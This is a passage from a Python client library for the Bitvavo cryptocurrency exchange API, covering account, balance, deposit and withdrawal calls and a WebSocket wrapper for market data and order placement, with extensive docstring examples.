```
"""
options["market"] = market
postfix = createPostfix(options)
return self.privateRequest("/trades", postfix, {}, "GET", 5)
def account(self) -> Dict[str, strdict]:
"""Get all fees for this account
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"fees": {
"taker": "0.0025",
"maker": "0.0015",
"volume": "10000.00"
}
}
```
"""
return self.privateRequest("/account", "", {}, "GET")
def balance(self, options: strdict) -> Union[List[strdict], errordict]:
"""Get the balance for this account
---
Args:
```python
options={} # return all balances
options={symbol="BTC"} # return a single balance
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"symbol": "BTC",
"available": "1.57593193",
"inOrder": "0.74832374"
}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/balance", postfix, {}, "GET", 5)
def depositAssets(self, symbol: str) -> strdict:
"""Get the deposit address (with paymentId for some assets) or bank account information to increase your balance
---
Args:
```python
symbol="BTC"
symbol="SHIB"
symbol="EUR"
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"address": "CryptoCurrencyAddress",
"paymentId": "10002653"
}
# or
{
"iban": "NL32BUNQ2291234129",
"bic": "BUNQNL2A",
"description": "254D20CC94"
}
```
"""
postfix = createPostfix({"symbol": symbol})
return self.privateRequest("/deposit", postfix, {}, "GET")
def depositHistory(self, options: anydict) -> Union[List[anydict], errordict]:
"""Get the deposit history of the account
Even when you want something from a single `symbol`, you'll still receive a list with multiple deposits.
---
Args:
```python
options={
"symbol":"EUR"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0"
}
]
# or
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "500",
"address": "NL32BITV0001234567",
"fee": "0"
}
]
```
"""
postfix = createPostfix(options)
return self.privateRequest("/depositHistory", postfix, {}, "GET", 5)
def withdrawAssets(self, symbol: str, amount: str, address: str, body: anydict) -> anydict:
"""Withdraw a coin/token to an external crypto address or bank account.
---
Args:
```python
symbol="SHIB"
amount=10
address="BitcoinAddress", # Wallet address or IBAN
options={
"paymentId": "10002653", # For digital assets only. Should be set when withdrawing straight to another exchange or merchants that require payment id's.
"internal": false, # For digital assets only. Should be set to true if the withdrawal must be sent to another Bitvavo user internally
"addWithdrawalFee": false # If set to true, the fee will be added on top of the requested amount, otherwise the fee is part of the requested amount and subtracted from the withdrawal.
}
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"success": true,
"symbol": "BTC",
"amount": "1.5"
}
```
"""
body["symbol"] = symbol
body["amount"] = amount
body["address"] = address
return self.privateRequest("/withdrawal", "", body, "POST")
def withdrawalHistory(self, options: anydict) -> Union[List[anydict], anydict]:
"""Get the withdrawal history
---
Args:
```python
options={
"symbol":"SHIB"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0.00006",
"status": "awaiting_processing"
}
}
```
"""
postfix = createPostfix(options)
return self.privateRequest("/withdrawalHistory", postfix, {}, "GET", 5)
def newWebsocket(self) -> "Bitvavo.WebSocketAppFacade":
return Bitvavo.WebSocketAppFacade(self.APIKEY, self.APISECRET, self.ACCESSWINDOW, self.wsUrl, self)
class WebSocketAppFacade:
"""
I gave this 'websocket' class a better name: WebSocketAppFacade.
It's a facade for the WebSocketApp class, with its own implementation for the on_* methods
"""
def __init__(self, APIKEY: str, APISECRET: str, ACCESSWINDOW: int, WSURL: str, bitvavo: "Bitvavo"):
self.APIKEY = APIKEY
self.APISECRET = APISECRET
self.ACCESSWINDOW = ACCESSWINDOW
self.WSURL = WSURL
self.open = False
self.callbacks: anydict = {}
self.keepAlive = True
self.reconnect = False
self.reconnectTimer: s_f = 0.1
self.bitvavo = bitvavo
self.subscribe()
def subscribe(self) -> None:
ws_lib.enableTrace(False)
self.ws = WebSocketApp(
self.WSURL,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
on_open=self.on_open,
)
self.receiveThread = ReceiveThread(self.ws, self)
self.receiveThread.daemon = True
self.receiveThread.start()
self.authenticated = False
self.keepBookCopy = False
self.localBook: anydict = {}
def closeSocket(self) -> None:
self.ws.close()
self.keepAlive = False
self.receiveThread.join()
def waitForSocket(self, ws: WebSocketApp, message: str, private: bool) -> None:
while True:
if (not private and self.open) or (private and self.authenticated and self.open):
return
time.sleep(0.1)
def doSend(self, ws: WebSocketApp, message: str, private: bool = False) -> None:
# TODO(NostraDavid) add nap-time to the websocket, or do it here; I don't know yet.
if private and self.APIKEY == "":
logger.error("no-apikey", tip="set the API key to be able to make private API calls")
return
self.waitForSocket(ws, message, private)
ws.send(message)
if self.bitvavo.debugging:
logger.debug("message-sent", message=message)
def on_message(self, ws, msg: str) -> None: # noqa: C901 (too-complex)
if self.bitvavo.debugging:
logger.debug("message-received", message=msg)
msg_dict: anydict = json.loads(msg)
callbacks = self.callbacks
if "error" in msg_dict:
if msg_dict["errorCode"] == 105:
self.bitvavo.updateRateLimit(msg_dict)
if "error" in callbacks:
callbacks["error"](msg_dict)
else:
logger.error(msg_dict)
if "action" in msg_dict:
if msg_dict["action"] == "getTime":
callbacks["time"](msg_dict["response"])
elif msg_dict["action"] == "getMarkets":
callbacks["markets"](msg_dict["response"])
elif msg_dict["action"] == "getAssets":
callbacks["assets"](msg_dict["response"])
elif msg_dict["action"] == "getTrades":
callbacks["publicTrades"](msg_dict["response"])
elif msg_dict["action"] == "getCandles":
callbacks["candles"](msg_dict["response"])
elif msg_dict["action"] == "getTicker24h":
callbacks["ticker24h"](msg_dict["response"])
elif msg_dict["action"] == "getTickerPrice":
callbacks["tickerPrice"](msg_dict["response"])
elif msg_dict["action"] == "getTickerBook":
callbacks["tickerBook"](msg_dict["response"])
elif msg_dict["action"] == "privateCreateOrder":
callbacks["placeOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateUpdateOrder":
callbacks["updateOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrder":
callbacks["getOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateCancelOrder":
callbacks["cancelOrder"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrders":
callbacks["getOrders"](msg_dict["response"])
elif msg_dict["action"] == "privateGetOrdersOpen":
callbacks["ordersOpen"](msg_dict["response"])
elif msg_dict["action"] == "privateGetTrades":
callbacks["trades"](msg_dict["response"])
elif msg_dict["action"] == "privateGetAccount":
callbacks["account"](msg_dict["response"])
elif msg_dict["action"] == "privateGetBalance":
callbacks["balance"](msg_dict["response"])
elif msg_dict["action"] == "privateDepositAssets":
callbacks["depositAssets"](msg_dict["response"])
elif msg_dict["action"] == "privateWithdrawAssets":
callbacks["withdrawAssets"](msg_dict["response"])
elif msg_dict["action"] == "privateGetDepositHistory":
callbacks["depositHistory"](msg_dict["response"])
elif msg_dict["action"] == "privateGetWithdrawalHistory":
callbacks["withdrawalHistory"](msg_dict["response"])
elif msg_dict["action"] == "privateCancelOrders":
callbacks["cancelOrders"](msg_dict["response"])
elif msg_dict["action"] == "getBook":
market = msg_dict["response"]["market"]
if "book" in callbacks:
callbacks["book"](msg_dict["response"])
if self.keepBookCopy:
if market in callbacks["subscriptionBook"]:
callbacks["subscriptionBook"][market](self, msg_dict)
elif "event" in msg_dict:
if msg_dict["event"] == "authenticate":
self.authenticated = True
elif msg_dict["event"] == "fill":
market = msg_dict["market"]
callbacks["subscriptionAccount"][market](msg_dict)
elif msg_dict["event"] == "order":
market = msg_dict["market"]
callbacks["subscriptionAccount"][market](msg_dict)
elif msg_dict["event"] == "ticker":
market = msg_dict["market"]
callbacks["subscriptionTicker"][market](msg_dict)
elif msg_dict["event"] == "ticker24h":
for entry in msg_dict["data"]:
callbacks["subscriptionTicker24h"][entry["market"]](entry)
elif msg_dict["event"] == "candle":
market = msg_dict["market"]
interval = msg_dict["interval"]
callbacks["subscriptionCandles"][market][interval](msg_dict)
elif msg_dict["event"] == "book":
market = msg_dict["market"]
if "subscriptionBookUpdate" in callbacks:
if market in callbacks["subscriptionBookUpdate"]:
callbacks["subscriptionBookUpdate"][market](msg_dict)
if self.keepBookCopy:
if market in callbacks["subscriptionBook"]:
callbacks["subscriptionBook"][market](self, msg_dict)
elif msg_dict["event"] == "trade":
market = msg_dict["market"]
if "subscriptionTrades" in callbacks:
callbacks["subscriptionTrades"][market](msg_dict)
def on_error(self, ws, error: Any) -> None:
if "error" in self.callbacks:
self.callbacks["error"](error)
else:
logger.error(error)
def on_close(self, ws) -> None:
self.receiveThread.stop()
if self.bitvavo.debugging:
logger.debug("websocket-closed")
def checkReconnect(self) -> None: # noqa: C901 (too-complex)
if "subscriptionTicker" in self.callbacks:
for market in self.callbacks["subscriptionTicker"]:
self.subscriptionTicker(market, self.callbacks["subscriptionTicker"][market])
if "subscriptionTicker24h" in self.callbacks:
for market in self.callbacks["subscriptionTicker24h"]:
self.subscriptionTicker(market, self.callbacks["subscriptionTicker24h"][market])
if "subscriptionAccount" in self.callbacks:
for market in self.callbacks["subscriptionAccount"]:
self.subscriptionAccount(market, self.callbacks["subscriptionAccount"][market])
if "subscriptionCandles" in self.callbacks:
for market in self.callbacks["subscriptionCandles"]:
for interval in self.callbacks["subscriptionCandles"][market]:
self.subscriptionCandles(
market,
interval,
self.callbacks["subscriptionCandles"][market][interval],
)
if "subscriptionTrades" in self.callbacks:
for market in self.callbacks["subscriptionTrades"]:
self.subscriptionTrades(market, self.callbacks["subscriptionTrades"][market])
if "subscriptionBookUpdate" in self.callbacks:
for market in self.callbacks["subscriptionBookUpdate"]:
self.subscriptionBookUpdate(market, self.callbacks["subscriptionBookUpdate"][market])
if "subscriptionBookUser" in self.callbacks:
for market in self.callbacks["subscriptionBookUser"]:
self.subscriptionBook(market, self.callbacks["subscriptionBookUser"][market])
def on_open(self, ws) -> None:
now = time_ms() + BITVAVO_API_UPGRADED.LAG
self.open = True
self.reconnectTimer = 0.5
if self.APIKEY != "":
self.doSend(
self.ws,
json.dumps(
{
"window": str(self.ACCESSWINDOW),
"action": "authenticate",
"key": self.APIKEY,
"signature": createSignature(now, "GET", "/websocket", {}, self.APISECRET),
"timestamp": now,
},
),
)
if self.reconnect:
if self.bitvavo.debugging:
logger.debug("reconnecting")
thread = Thread(target=self.checkReconnect)
thread.start()
def setErrorCallback(self, callback: Callable[[Any], None]) -> None:
self.callbacks["error"] = callback
def time(self, callback: Callable[[Any], None]) -> None:
"""Get server-time, in milliseconds, since 1970-01-01
---
Non-websocket examples:
* https://api.bitvavo.com/v2/time
---
Args:
```python
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{"time": 1539180275424 }
```
"""
self.callbacks["time"] = callback
self.doSend(self.ws, json.dumps({"action": "getTime"}))
def markets(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all available markets with some meta-information, unless options is given a `market` key.
Then you will get a single market, instead of a list of markets.
---
Examples:
* https://api.bitvavo.com/v2/markets
* https://api.bitvavo.com/v2/markets?market=BTC-EUR
* https://api.bitvavo.com/v2/markets?market=SHIB-EUR
---
Args:
```python
# Choose one:
options={} # returns all markets
options={"market": "BTC-EUR"} # returns only the BTC-EUR market
# If you want multiple markets, but not all, make multiple calls
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{
"market": "BTC-EUR",
"status": "trading",
"base": "BTC",
"quote": "EUR",
"pricePrecision": "5",
"minOrderInQuoteAsset": "10",
"minOrderInBaseAsset": "0.001",
"orderTypes": [
"market",
"limit",
"stopLoss",
"stopLossLimit",
"takeProfit",
"takeProfitLimit"
]
}
]
```
"""
self.callbacks["markets"] = callback
options["action"] = "getMarkets"
self.doSend(self.ws, json.dumps(options))
def assets(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all available assets, unless `options` is given a `symbol` key.
Then you will get a single asset, instead of a list of assets.
---
Examples:
* https://api.bitvavo.com/v2/assets
* https://api.bitvavo.com/v2/assets?symbol=BTC
* https://api.bitvavo.com/v2/assets?symbol=SHIB
* https://api.bitvavo.com/v2/assets?symbol=ADA
* https://api.bitvavo.com/v2/assets?symbol=EUR
---
Args:
```python
# pick one
options={} # returns all assets
options={"symbol": "BTC"} # returns a single asset (the one of Bitcoin)
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{
"symbol": "BTC",
"name": "Bitcoin",
"decimals": 8,
"depositFee": "0",
"depositConfirmations": 10,
"depositStatus": "OK",
"withdrawalFee": "0.2",
"withdrawalMinAmount": "0.2",
"withdrawalStatus": "OK",
"networks": ["Mainnet"],
"message": ""
}
]
```
"""
self.callbacks["assets"] = callback
options["action"] = "getAssets"
self.doSend(self.ws, json.dumps(options))
def book(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get a book (with two lists: asks and bids, as they're called)
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/book
* https://api.bitvavo.com/v2/SHIB-EUR/book?depth=10
* https://api.bitvavo.com/v2/ADA-EUR/book?depth=0
---
Args:
```python
market="ADA-EUR"
options={"depth": 3} # returns the best 3 asks and 3 bids
options={} # same as `{"depth": 0}`; returns all bids and asks for that book
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"market": "ADA-EUR",
"nonce": 10378032,
"bids": [["1.1908", "600"], ["1.1902", "4091.359809"], ["1.1898", "7563"]],
"asks": [["1.1917", "2382.166997"], ["1.1919", "440.7"], ["1.192", "600"]],
}
# Notice how each bid and ask is also a list
bid = ["1.1908", "600"] # the first bid from the bids list
price = bid[0] # the price for one coin/token
size = bid[1] # how many tokens are asked (or bidded, in this case)
result = price * size
assert result == 714.48 # EUR can be gained from this bid if it's sold (minus the fee)
```
"""
self.callbacks["book"] = callback
options["market"] = market
options["action"] = "getBook"
self.doSend(self.ws, json.dumps(options))
def publicTrades(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Publically available trades
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/trades
* https://api.bitvavo.com/v2/SHIB-EUR/trades?limit=10
* https://api.bitvavo.com/v2/ADA-EUR/trades?tradeIdFrom=532f4d4d-f545-4a2d-a175-3d37919cb73c
* https://api.bitvavo.com/v2/NANO-EUR/trades
---
Args:
```python
market="NANO-EUR"
# note that any of these `options` are optional
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"id": "57b1159b-6bf5-4cde-9e2c-6bd6a5678baf",
"amount": "0.1",
"price": "5012",
"side": "sell"
}
]
```
"""
self.callbacks["publicTrades"] = callback
options["market"] = market
options["action"] = "getTrades"
self.doSend(self.ws, json.dumps(options))
def candles(self, market: str, interval: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get up to 1440 candles for a market, with a specific interval (candle size)
Extra reading material: https://en.wikipedia.org/wiki/Candlestick_chart
## WARNING: RETURN TYPE IS WEIRD - CHECK BOTTOM OF THIS TEXT FOR EXPLANATION
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/candles?interval=1h&limit=100
---
Args:
```python
market="BTC-EUR"
interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1440 ], default 1440
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8640000000000000
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
# For whatever reason, you're getting a list of lists; no keys,
# so here is the explanation of what's what.
# timestamp, open, high, low, close, volume
[1640815200000, "41648", "41859", "41519", "41790", "12.1926685"],
[1640811600000, "41771", "41780", "41462", "41650", "13.90917427"],
[1640808000000, "41539", "42083", "41485", "41771", "14.39770267"],
[1640804400000, "41937", "41955", "41449", "41540", "23.64498292"],
[1640800800000, "41955", "42163", "41807", "41939", "10.40093845"],
]
```
"""
self.callbacks["candles"] = callback
options["market"] = market
options["interval"] = interval
options["action"] = "getCandles"
self.doSend(self.ws, json.dumps(options))
def tickerPrice(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the current price for each market
---
Examples:
* https://api.bitvavo.com/v2/ticker/price
* https://api.bitvavo.com/v2/ticker/price?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/price?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/price?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/price?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/price?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
# Note that `price` is unconverted
[
{"market": "1INCH-EUR", "price": "2.1594"},
{"market": "AAVE-EUR", "price": "214.42"},
{"market": "ADA-BTC", "price": "0.000021401"},
{"market": "ADA-EUR", "price": "1.2011"},
{"market": "ADX-EUR", "price": "0.50357"},
{"market": "AE-BTC", "price": "0.0000031334"},
{"market": "AE-EUR", "price": "0.064378"},
{"market": "AION-BTC", "price": "0.000004433"},
{"market": "AION-EUR", "price": "0.1258"},
{"market": "AKRO-EUR", "price": "0.020562"},
{"market": "ALGO-EUR", "price": "1.3942"},
# and another 210 markets below this point
]
```
"""
self.callbacks["tickerPrice"] = callback
options["action"] = "getTickerPrice"
self.doSend(self.ws, json.dumps(options))
def tickerBook(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/book
* https://api.bitvavo.com/v2/ticker/book?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/book?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/book?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/book?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/book?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{"market": "1INCH-EUR", "bid": "2.1534", "ask": "2.1587", "bidSize": "194.8", "askSize": "194.8"},
{"market": "AAVE-EUR", "bid": "213.7", "ask": "214.05", "bidSize": "212.532", "askSize": "4.77676965"},
{"market": "ADA-EUR", "bid": "1.2", "ask": "1.2014", "bidSize": "415.627597", "askSize": "600"},
{"market": "ADX-EUR", "bid": "0.49896", "ask": "0.50076", "bidSize": "1262.38216882", "askSize": "700.1"},
{"market": "AION-EUR", "bid": "0.12531", "ask": "0.12578", "bidSize": "3345", "askSize": "10958.49228653"},
# and another 215 markets below this point
]
```
"""
self.callbacks["tickerBook"] = callback
options["action"] = "getTickerBook"
self.doSend(self.ws, json.dumps(options))
def ticker24h(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/24h
* https://api.bitvavo.com/v2/ticker/24h?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns this to `callback`:
```python
[
{
"market": "1INCH-EUR",
"open": "2.2722",
"high": "2.2967",
"low": "2.1258",
"last": "2.1552",
"volume": "92921.3792573",
"volumeQuote": "204118.95",
"bid": "2.1481",
"bidSize": "392.46514457",
"ask": "2.1513",
"askSize": "195.3",
"timestamp": 1640819573777
},
{
"market": "AAVE-EUR",
"open": "224.91",
"high": "228.89",
"low": "210.78",
"last": "213.83",
"volume": "5970.52391148",
"volumeQuote": "1307777.47",
"bid": "213.41",
"bidSize": "2.61115011",
"ask": "213.85",
"askSize": "1.864",
"timestamp": 1640819573285
},
# and then 219 more markets
]
```
"""
self.callbacks["ticker24h"] = callback
options["action"] = "getTicker24h"
self.doSend(self.ws, json.dumps(options))
def placeOrder(
self,
market: str,
side: str,
orderType: str,
body: anydict,
callback: Callable[[Any], None],
) -> None:
"""Place a new order on the exchange
---
Args:
```python
market="SHIB-EUR"
side="buy" # Choose: buy, sell
# For market orders either `amount` or `amountQuote` is required
orderType="market" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"amountQuote": "5000",
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
# For limit orders `amount` and `price` are required.
orderType="limit" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"price": "6000",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": True
}
orderType="stopLoss"
# or
orderType="takeProfit"
body={
"amount": "1.567",
"amountQuote": "5000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true
}
orderType="stopLossLimit"
# or
orderType="takeProfitLimit"
body={
"amount": "1.567",
"price": "6000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": false,
"disableMarketProtection": true
}
```
"""
self.callbacks["placeOrder"] = callback
body["market"] = market
body["side"] = side
body["orderType"] = orderType
body["action"] = "privateCreateOrder"
self.doSend(self.ws, json.dumps(body), True)
def updateOrder(self, market: str, orderId: str, body: anydict, callback: Callable[[Any], None]) -> None:
"""Update an existing order for a specific market. Make sure that at least one of the optional parameters is set,
otherwise nothing will be updated.
---
Args:
```python
market="BTC-EUR"
orderId="95d92d6c-ecf0-4960-a608-9953ef71652e"
body={
"amount": "1.567",
"amountRemaining": "1.567",
"price": "6000",
"triggerAmount": "4000", # only for stop orders
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smallest of the two orders.
# 'cancelOldest' will cancel the entire older order and places the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
self.callbacks["updateOrder"] = callback
body["market"] = market
body["orderId"] = orderId
body["action"] = "privateUpdateOrder"
self.doSend(self.ws, json.dumps(body), True)
def cancelOrder(self, market: str, orderId: str, callback: Callable[[Any], None]) -> None:
"""Cancel an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="a4a5d310-687c-486e-a3eb-1df832405ccd"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{"orderId": "2e7ce7fc-44e2-4d80-a4a7-d079c4750b61"}
```
"""
self.callbacks["cancelOrder"] = callback
options = {
"action": "privateCancelOrder",
"market": market,
"orderId": orderId,
}
self.doSend(self.ws, json.dumps(options), True)
def getOrder(self, market: str, orderId: str, callback: Callable[[Any], None]) -> None:
"""Get an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="ff403e21-e270-4584-bc9e-9c4b18461465"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
self.callbacks["getOrder"] = callback
options = {
"action": "privateGetOrder",
"market": market,
"orderId": orderId,
}
self.doSend(self.ws, json.dumps(options), True)
def getOrders(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get multiple existing orders for a specific market
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
